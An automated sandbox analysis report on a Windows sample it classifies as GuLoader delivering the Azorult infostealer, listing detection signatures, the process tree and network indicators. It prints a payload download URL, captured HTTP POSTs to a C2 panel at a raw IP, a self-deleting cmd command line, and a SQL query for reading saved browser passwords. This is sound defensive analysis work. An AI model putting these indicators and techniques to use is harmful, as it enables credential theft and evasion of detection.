Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Halkbank02.exe

Overview

General Information

Sample Name:Halkbank02.exe
Analysis ID:483639
MD5:a4cb6740c9195c5579acef4f7c8e40c7
SHA1:54abe0f828d828d5ff840b989fb5f010395961f6
SHA256:f1b1abf0182c865a3521d659cbc4bd86a4b00b0e4be95468a1d3b5ff46a3efc8
Tags:exegeoGuLoaderHalkbankTUR
Infos:

Most interesting Screenshot:

Detection

GuLoader Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Halkbank02.exe (PID: 5488 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
    • Halkbank02.exe (PID: 5680 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
      • cmd.exe (PID: 2920 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6500 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    0000001C.00000002.900879617.000000001F410000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      28.2.Halkbank02.exe.1fcb3556.3.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x41cd65:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x41d952:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x28deb0:$string2: API call with %s database connection pointer
      • 0x28eae4:$string3: os_win.c:%d: (%lu) %s(%s) - %s
      28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x41876c:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x419359:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x2898b7:$string2: API call with %s database connection pointer
      • 0x28a4eb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
      28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x413dfc:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x4149e9:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x284f47:$string2: API call with %s database connection pointer
      • 0x285b7b:$string3: os_win.c:%d: (%lu) %s(%s) - %s

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Halkbank02.exeReversingLabs: Detection: 13%
      Source: Halkbank02.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49822 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49825 version: TLS 1.2
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1l
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 31.210.20.16 31.210.20.16
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-c0-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
      Source: global trafficHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 80859Cache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: Halkbank02.exe, 0000001C.00000002.899718241.000000001E420000.00000004.00000001.sdmpString found in binary or memory: http://31.210.20.16/panel1/index.php
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.thawte.com0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: mozglue.dll.28.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://www.mozilla.com0
      Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-c0-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49822 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49825 version: TLS 1.2

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Malicious sample detected (through community Yara rule)Show sources
      Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: Halkbank02.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
